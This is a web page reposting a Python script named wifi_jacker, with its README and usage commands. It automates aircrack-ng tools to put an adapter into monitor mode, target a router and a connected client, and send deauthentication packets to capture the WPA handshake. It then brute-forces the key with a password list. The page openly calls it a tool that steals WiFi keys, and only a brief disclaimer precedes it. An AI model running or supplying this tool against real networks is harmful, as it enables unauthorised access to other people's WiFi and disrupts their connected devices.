
wifi_jacker – script for steals WPA keys.
LEGAL DISCLAMER
The author does not hold any responsibility about the bad use of this script, remmember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.
wifi_jacker is a quick program that (potentially) steals WiFi keys via brute force hats off to the guys who made aircrack-ng the success of this all depends on the strength of your password dictionary good WPA keys will be harder to crack.
**** TO GET WIFI KEYS: ****
STEP 0: put your wifi adapter into monitor mode.
STEP 1: find a router MAC, then hone in with said MAC
STEP 2: find a client connected to the target router
STEP 3: force client to re-connect and leak the 4-way handshake
STEP 4: pray to your deity of choice that step 3 works.
STEP 5: crack password found in step 3 using your password list Again, no guarantee that this works. Such is life/a reasonably strong WPA key.
**** INGREDIENTS: ****
+ Kali Linux/Backtrack, Linux Platform and aircrack-ng
+ a USB wifi adapter capable of entering monitor mode
+ a meaty password list (under this directory)
+ consent
TROUBLESHOOTING:
* this program assumes your USB wireless and minotor interfaces are named “wlan0” and “wlan0mon” respectively. change these accordingly.
* if it messes up half way through, you probably need to manually put your usb wifi interface back into managed mode with ‘sudo airmon-ng stop <name of monitor interface>’
Script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 |
import os, sys, re, time ''' README: this is a quick program that (potentially) steals WiFi keys via brute force hats off to the guys who made aircrack-ng the success of this all depends on the strength of your password dictionary good WPA keys will be harder to crack **** INGREDIENTS: **** + Kali Linux/Backtrack + a USB wifi adapter capable of entering monitor mode + a meaty password list (under this directory) + consent **** TO GET WIFI KEYS: **** STEP 0: put your wifi adapter into monitor mode. STEP 1: find a router MAC, then hone in with said MAC STEP 2: find a client connected to the target router STEP 3: force client to re-connect and leak the 4-way handshake STEP 4: pray to your deity of choice that step 3 works. STEP 5: crack password found in step 3 using your password list Again, no guarantee that this works. Such is life/a reasonably strong WPA key. This is probably full of bugs that I will never fix TROUBLESHOOTING: *this program assumes your USB wireless and minotor interfaces are named "wlan0" and "wlan0mon" respectively. change these accordingly. *if it messes up half way through, you probably need to manually put your usb wifi interface back into managed mode with 'sudo airmon-ng stop <name of monitor interface>' ''' print( " *__ _ _ _ _ _ __ __*\n" + " *\ \ / (_) __(_) _ | |__ _ __| |_____ _ _ __ __/ \ / |*\n" + " *\ \/\/ /| | _|| | | || / _` / _| / / -_) '_| \ V / () || |*\n" + " *\_/\_/ |_|_| |_| \__/\__,_\__|_\_\___|_| \_/ \__(*)_|*\n\n\n") class Wifi_Jacker: def __init__(self): self.mon_mode = False self.usb_int = "wlan0" self.mon_int = "wlan0mon" self.ap_MAC = None self.client = None self.wordlist = "rockyou.txt" self.welcome() def welcome(self): picd = True while picd: resp = input("*** please select an option ***\n\n" \ "1. put interface into monitor mode\n" \ "2. scan for router MACs\n" \ "3. hone in on a router/scan for clients\n" \ "4. force client deauth\n" \ "5. crack password\n" "6. exit\n\n") try: resp = int(resp) except ValueError: pass if resp not in range(1,8): pass else: picd = False if resp == 1: if not self.mon_mode: self.monmode_config(1) else: print("\ninterface already in monitor mode\n") self.welcome() elif resp == 2: if self.mon_mode: self.r_scan() else: print("\ninterface must be in monitor mode to scan\n") self.welcome() elif resp == 3: self.check_bssid() elif resp == 4: if self.ap_MAC is not None: self.c_reconnect() else: print("please search for a target AP via option #3 first") self.welcome() elif resp == 5: if self.ap_MAC is not None: self.crack() else: print("please search for a target AP via option #3 first\nalso, make sure you have a captured WPA key before doing this...") self.welcome() elif resp == 6: if self.mon_mode: self.monmode_config(-1) os.system("sudo pkill airodump-ng && sudo pkill python3") #this is stupid but it works print("BYE") sys.exit(0) def monmode_config(self, conf): try: if conf == 1: print("\nputting interface " + self.usb_int +" into monitor mode...") mon_up = os.system("sudo airmon-ng start " + self.usb_int) if mon_up == 0: self.mon_mode = True else: raise OSError print("interface now in monitor mode...\n") self.welcome() elif conf == -1: print("\nputting interface " + self.usb_int + " back into managed mode...") mon_down = os.system("sudo airmon-ng stop " + self.mon_int) if mon_down == 0: self.mon_mode = False else: raise OSError except OSError: print("something went wrong here. check your interface(s)") pass def r_scan(self): try: pid = os.fork() if pid > 0: os.system("sudo xterm -e airodump-ng " + self.mon_int) os.wait() self.welcome() except OSError: pass def check_bssid(self): picd = True while picd: bssid = input("please give the BSSID of the target AP (use '-' delimiter):") if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()): picd = False chan = self.check_chan(True) self.ap_MAC = bssid self.hone(bssid, chan) else: print("invalid MAC") pass def c_reconnect(self): picd = True while picd: bssid = input("please give the MAC of a client connected to target AP (use '-' delimiter):") if re.match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", bssid.lower()): picd = False bssid = bssid.replace(":", "-") self.client = bssid deez = self.check_chan(False) pid = os.fork() if pid > 0: os.system("sudo xterm -e aireplay-ng -0 " + str(deez) + " -a " + str(self.ap_MAC) + " -c " + str(self.client) + " " + self.mon_int) os.wait() print("*** IMPORTANT ***\n" \ "You now need to wait until you see 'WPA: <AP MAC>' \n" "in the top right had corner of your honed-in airodump-ng screen,\n" "this signifies that the 4-way handshake has been caught\n." "If this doesn't happen within a reasonable timeframe, you:\n " "1. Are shit out of luck,\n" " as the client has not re-connected for some reason.\n" " Try again with a different client.\n" "2. Need to physically move closer to the target AP/client.") self.welcome() else: print("invalid client MAC") pass def check_chan(self, opt): picd = True while picd: if opt: chan = input("please specify channel #:") else: chan = input("please specify # of deauth packets to send (2 is good):") try: resp = int(chan) picd = False return resp except ValueError: pass def hone(self, bssid, chan): try: pid = os.fork() if pid > 0: bssid = bssid.replace(":", "-") self.ap_MAC = bssid os.system("sudo xterm -e airodump-ng -c " + str(chan) + " --bssid " + str(bssid) + " -w ./ " + self.mon_int) os.wait() self.welcome() except OSError: print("something went wrong here. check your interface(s)") pass def crack(self): #assumes there is only one .cap file, but w/e k_type = input("what are we working with here? WEP, or WPA-PSK?") k_type = "1" if k_type == "WEP" else "2" try: pid = os.fork() if pid > 0: os.system("sudo aircrack-ng -a" + k_type + " -b " + self.ap_MAC + " -w ./" + self.wordlist + " ./-01.cap > pword.txt") os.wait() print("cracking...") time.sleep(5) print("check 'pword.txt' for your password! no guarantees") self.welcome() except OSError as ose: print("something went wrong here:\n", ose) pass if __name__ == "__main__": wj = Wifi_Jacker() |
Usage:
1 2 |
git clone https://github.com/hannay1/WiFi_Jacker && cd WiFi_Jacker sudo python2 wifi_jacker.py |
Source: https://github.com/hannay1